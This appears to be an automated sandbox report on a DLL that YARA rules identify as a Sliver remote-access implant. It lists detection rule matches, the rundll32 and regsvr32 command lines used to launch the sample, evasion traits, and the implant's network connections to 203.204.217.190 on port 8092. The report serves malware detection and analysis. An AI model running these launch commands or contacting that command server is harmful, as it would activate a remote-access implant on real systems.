            Source: 5cPRapVOx6.dll, type: SAMPLEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: classification engineClassification label: mal96.troj.evad.winDLL@14/0@0/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
            Source: 5cPRapVOx6.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
            Source: 5cPRapVOx6.dllReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstallJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServerJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: 5cPRapVOx6.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: 5cPRapVOx6.dllStatic PE information: Image base 0x68340000 > 0x60000000
            Source: 5cPRapVOx6.dllStatic file information: File size 16616960 > 1048576
            Source: 5cPRapVOx6.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x9db200
            Source: 5cPRapVOx6.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x571e00
            Source: 5cPRapVOx6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 5cPRapVOx6.dllStatic PE information: section name: .eh_fram
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0CC80A18 push 3E6CDD5Dh; retn 0000h6_2_0CC80A1D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0C838618 pushfd ; ret 7_2_0C83861A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0C880194 pushfd ; ret 7_2_0C88019A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0CC30E51 push cs; ret 8_2_0CC30E52

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 8092
            Source: unknownNetwork traffic detected: HTTP traffic on port 8092 -> 49772
            Source: C:\Windows\System32\loaddll32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5744Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 5808Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 8184Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 4340Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 6120Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
            Source: regsvr32.exe, 00000004.00000002.4209945473.0000000000B1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4210958697.000000000099A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4210351157.000000000059A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 203.204.217.190 8092Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\Windows\SysWOW64\regsvr32.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\SysWOW64\rundll32.exe VolumeInformationJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Sliver Implants
            Source: Yara matchFile source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.3835816223.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4218398121.000000000A114000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4217009815.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2589897810.000000000CCD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Sliver Implants
            Source: Yara matchFile source: 00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
